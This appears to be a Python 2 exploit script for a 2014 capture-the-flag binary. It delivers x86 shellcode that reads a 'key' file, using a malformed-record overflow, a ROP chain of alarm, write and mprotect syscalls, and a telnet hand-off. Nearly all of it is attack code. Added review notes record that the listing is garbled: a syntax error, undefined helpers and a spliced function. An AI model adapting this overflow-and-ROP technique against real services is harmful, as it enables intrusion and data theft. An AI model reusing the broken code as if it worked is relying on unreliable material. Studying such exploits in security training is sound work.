#!/usr/bin/python
# NOTE(review): this listing was recovered from a whitespace-collapsed paste and is
# incomplete. screw_endian(), JFD, JBSP and the module-level name `endianness`
# are used below but never defined in what survived, and the text between the
# `def unpack` line and `class JME` is a fragment of some other method (it reads
# self.data / self.sub_things and returns header + val + ...). Layout below is
# reconstructed; tokens are kept as recovered. Python 2 syntax throughout
# (print statement, raw_input, xrange, str.decode('hex'), makefile(bufsize=)).
import struct
import socket
import telnetlib

# Hex-encoded machine code, decoded to raw bytes and right-padded with 0x90 to
# 95 bytes. NOTE(review): the recovered text reads `ljust(95 '\x90')` with no
# comma between the arguments — kept verbatim, it is a SyntaxError as written.
shellcode = '31d231c9eb255bb805000000cd80ba4000000089e189c3b803000000cd80bb04000000b804000000cd80cce8d6ffffff6b657900'.decode('hex').ljust(95 '\x90')

def pack_le(v):
    """Pack *v* as a 4-byte unsigned int with struct format 'I'.

    NOTE(review): 'I' is native byte order and alignment, not '<I'; the name
    promises little-endian, which only holds on a little-endian host.
    """
    return struct.pack('I', v)

# NOTE(review): garbled as recovered — the `unpack` body is spliced together with
# the tail of an unrelated encode() method (it references self, header, val and
# `endianness`, none of which are in scope here). Left as-is rather than guessed.
def unpack(v): return struct.unpack('H', len(self.data)) endianness = not endianness return header + val + self.data + ''.join(t.encode() for t in self.sub_things)

class JME(object):
    """One 'JME' record: 8-byte header (via screw_endian) + 'A' + u16 length + data + children."""
    magic = 0x454D4A
    # NOTE(review): class-level mutable default — every JME instance that does not
    # assign its own sub_things shares this one list.
    sub_things = []
    data = None

    def length(self):
        """Encoded size: 8-byte header, 3 bytes ('A' + u16), data, then children's lengths."""
        return 8 + 3 + len(self.data) + sum(t.length() for t in self.sub_things)

    def encode(self):
        """Serialize this record and its sub_things (each via its own encode())."""
        # NOTE(review): `global endianness` is declared but never read or assigned
        # in this method; presumably screw_endian() consults it — not visible here.
        global endianness
        header = screw_endian(self.magic, self.length())
        val = struct.pack('H', len(self.data))
        return header + 'A' + val + self.data + ''.join(t.encode() for t in self.sub_things)

class JML(object):
    """Leaf 'JML' record: 8-byte header (via screw_endian) followed by raw data."""
    magic = 0x4C4D4A
    data = None

    def length(self):
        """Encoded size: 8-byte header plus data."""
        return 8 + len(self.data)

    def encode(self):
        """Serialize header + data; no children."""
        header = screw_endian(self.magic, self.length())
        return header + self.data

# --- session setup: blocking TCP socket wrapped in an unbuffered read/write file ---
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#s.connect(('whelk.club.cc.cmu.edu', 4334))
s.connect(('bytesexual.2014.ghostintheshellcode.com', 4334))
f = s.makefile('rw', bufsize=0)
# Blocks until the operator presses Enter (e.g. to attach a debugger first).
raw_input()
f.write('1\n')
f.write(pack_le(0x80000000))
#jml = JML()
#jml.data = 'A'
#
# Build the record tree: JBSP -> JFD('hello') -> JME(shellcode).
# NOTE(review): JFD and JBSP are not defined in the recovered text.
jme = JME()
jme.data = shellcode
#jme.sub_things = [jml]
jme.sub_things = []
root_jfd = JFD()
root_jfd.data = 'hello'
root_jfd.sub_things = [jme]
jbsp = JBSP()
jbsp.root_jfd = root_jfd
encoded = jbsp.encode()
# Each message is a menu choice line followed by a 4-byte length prefix and body.
f.write('1\n')
f.write(pack_le(len(encoded)) + encoded)
f.write('1\n')
f.write(pack_le(0x1000))
f.write('A' * 0x1000)
# Same tree encoded a second time; `endianness` may have been toggled by then
# (see the garbled fragment above) — TODO confirm against screw_endian().
encoded = jbsp.encode()
f.write('1\n')
f.write(pack_le(len(encoded)) + encoded)
f.write('4\n')
f.write('hello\n')
tlv = screw_endian(0x41414141, 0x7fffffff)
f.write(tlv)
'''
 80483de: 58 pop %eax
 80483df: 5e pop %esi
 80483e0: 5f pop %edi
 80483e1: 59 pop %ecx
 80483e2: 5a pop %edx
 80483e3: 5b pop %ebx
 80483e4: cb lret
'''
# Addresses as recorded by the author for the target binary; not verifiable here.
gadget = 0x80483de
int_80_ret = 0x80482e0
cs_32 = 0x23
# NOTE(review): this rebinds `jbsp` from the JBSP object above to an int; it is
# only used as a packed address from here on.
jbsp = 0x0804C768
#shellcode_addr = 0x775dd110 # mine
shellcode_addr = 0x775e5110 # theirs
# 2076 bytes of filler, then the packed word sequence below.
payload = 'A' * 2076
payload += pack_le(gadget)
payload += pack_le(0x1b) # alarm
payload += pack_le(0)
payload += pack_le(0)
payload += pack_le(0)
payload += pack_le(0)
payload += pack_le(9999) # 0 seconds
payload += pack_le(int_80_ret)
payload += pack_le(cs_32)
payload += pack_le(gadget)
payload += pack_le(0x4) # write
payload += pack_le(0)
payload += pack_le(0)
payload += pack_le(jbsp) # buf
payload += pack_le(4) # len
payload += pack_le(4) # fd
payload += pack_le(int_80_ret)
payload += pack_le(cs_32)
payload += pack_le(gadget)
payload += pack_le(0x7d) # mprotect
payload += pack_le(0)
payload += pack_le(0)
payload += pack_le(4096) # len
payload += pack_le(7) # prot
payload += pack_le(shellcode_addr & 0xfffff000)
payload += pack_le(int_80_ret)
payload += pack_le(cs_32)
payload += pack_le(shellcode_addr)
# Drain 61 lines of server output before sending.
for _ in xrange(61):
    f.readline()
f.write(payload)
print 'About to shutdown'
# Half-close: no more writes from this side, reads still allowed.
s.shutdown(socket.SHUT_WR)
data = f.read(4)
# NOTE(review): as written, unpack() returns a tuple (struct.unpack) and is
# given a 4-byte buffer with format 'H' — see the garbled definition above.
shellcode_addr = unpack(data) + 0x6c
print 'shellcode_addr:', hex(shellcode_addr)
# Hand the existing socket to a Telnet object for an interactive session.
t = telnetlib.Telnet()
t.sock = s
t.interact()